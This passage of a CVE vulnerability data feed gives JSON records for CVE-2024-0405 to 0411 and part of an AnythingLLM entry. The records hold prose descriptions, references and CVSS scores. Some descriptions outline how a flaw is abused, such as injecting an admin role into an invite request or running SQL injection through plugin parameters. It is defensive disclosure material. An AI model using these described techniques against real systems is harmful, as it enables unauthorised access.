"https://github.com/mintplex-labs/anything-llm/commit/8cd3a92c660b202655d99bee90b2864694c99946", "name" : "https://github.com/mintplex-labs/anything-llm/commit/8cd3a92c660b202655d99bee90b2864694c99946", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mintplex-labs/anything-llm/commit/8cd3a92c660b202655d99bee90b2864694c99946", "name" : "https://github.com/mintplex-labs/anything-llm/commit/8cd3a92c660b202655d99bee90b2864694c99946", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/b4355bae-766a-4bb0-942b-607bc491b23d", "name" : "https://huntr.com/bounties/b4355bae-766a-4bb0-942b-607bc491b23d", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/b4355bae-766a-4bb0-942b-607bc491b23d", "name" : "https://huntr.com/bounties/b4355bae-766a-4bb0-942b-607bc491b23d", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A mass assignment vulnerability exists in the `/api/invite/:code` endpoint of the mintplex-labs/anything-llm repository, allowing unauthorized creation of high-privileged accounts. By intercepting and modifying the HTTP request during the account creation process via an invitation link, an attacker can add a `role` property with `admin` value, thereby gaining administrative access. This issue arises due to the lack of property allowlisting and blocklisting, enabling the attacker to exploit the system and perform actions as an administrator." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-16T00:15Z", "lastModifiedDate" : "2025-07-09T19:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0405", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380", "name" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380", "name" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L380", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926", "name" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926", "name" : "https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/statistics/class-statistics.php?rev=3011996#L926", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:burst-statistics:burst_statistics:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-17T05:15Z", "lastModifiedDate" : "2025-06-02T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0406", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2025:2449", "name" : "RHSA-2025:2449", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0406", "name" : "https://access.redhat.com/security/cve/CVE-2024-0406", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0406", "name" : "https://access.redhat.com/security/cve/CVE-2024-0406", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257749", "name" : "RHBZ#2257749", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257749", "name" : "RHBZ#2257749", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted tar file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mholt:archiver:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0.0", "versionEndExcluding" : "4.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:advanced_cluster_security:3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.18", "versionEndExcluding" : "4.18.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-04-06T17:15Z", "lastModifiedDate" : "2025-04-25T15:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0407", "ASSIGNER" : "hp-security-alert@hp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.hp.com/us-en/document/ish_10174094-10174120-16", "name" : "https://support.hp.com/us-en/document/ish_10174094-10174120-16", "refsource" : "", "tags" : [ ] }, { "url" : "https://support.hp.com/us-en/document/ish_10174094-10174120-16", "name" : "https://support.hp.com/us-en/document/ish_10174094-10174120-16", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Certain HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to information disclosure, when connections made by the device back to services enabled by some solutions may have been trusted without the appropriate CA certificate in the device's certificate store." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-02-21T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0408", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0408", "name" : "https://access.redhat.com/security/cve/CVE-2024-0408", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0408", "name" : "https://access.redhat.com/security/cve/CVE-2024-0408", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257689", "name" : "RHBZ#2257689", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257689", "name" : "RHBZ#2257689", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-30", "name" : "https://security.gentoo.org/glsa/202401-30", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240307-0006/", "name" : "https://security.netapp.com/advisory/ntap-20240307-0006/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:xwayland:*:*:*:*:*:*:*:*", "versionEndExcluding" : "23.2.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:xorg-server:*:*:*:*:*:*:*:*", "versionEndExcluding" : "21.1.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tigervnc:tigervnc:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-18T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0409", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0320", "name" : "RHSA-2024:0320", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2169", "name" : "RHSA-2024:2169", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2170", "name" : "RHSA-2024:2170", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2995", "name" : "RHSA-2024:2995", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:2996", "name" : "RHSA-2024:2996", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0409", "name" : "https://access.redhat.com/security/cve/CVE-2024-0409", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0409", "name" : "https://access.redhat.com/security/cve/CVE-2024-0409", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257690", "name" : "RHBZ#2257690", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2257690", "name" : "RHBZ#2257690", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00016.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J4H7CH565ALSZZYKOJFYDA5KFLG6NUK/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IZ75X54CN4IFYMIV7OK3JVZ57FHQIGIC/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.gentoo.org/glsa/202401-30", "name" : "https://security.gentoo.org/glsa/202401-30", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240307-0006/", "name" : "https://security.netapp.com/advisory/ntap-20240307-0006/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:xwayland:*:*:*:*:*:*:*:*", "versionEndExcluding" : "23.2.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:x.org:xorg-server:*:*:*:*:*:*:*:*", "versionEndExcluding" : "21.1.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tigervnc:tigervnc:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-18T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0410", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437988", "name" : "GitLab Issue #437988", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437988", "name" : "GitLab Issue #437988", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2296778", "name" : "HackerOne Bug Bounty Report #2296778", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2296778", "name" : "HackerOne Bug Bounty Report #2296778", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*", "versionStartIncluding" : "16.8.0", "versionEndExcluding" : "16.8.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*", "versionStartIncluding" : "15.1.0", "versionEndExcluding" : "16.7.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.7, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.3, "impactScore" : 5.8 } }, "publishedDate" : "2024-02-22T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0411", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/9G6K6RBjS4M4", "name" : "https://note.zhaoj.in/share/9G6K6RBjS4M4", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/9G6K6RBjS4M4", "name" : "https://note.zhaoj.in/share/9G6K6RBjS4M4", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250431", "name" : "https://vuldb.com/?ctiid.250431", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250431", "name" : "https://vuldb.com/?ctiid.250431", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250431", "name" : "https://vuldb.com/?id.250431", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250431", "name" : "https://vuldb.com/?id.250431", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in DeShang DSMall up to 6.1.0. It has been classified as problematic. This affects an unknown part of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250431." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsmall:*:*:*:*:*:*:*:*", "versionEndIncluding" : "6.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : 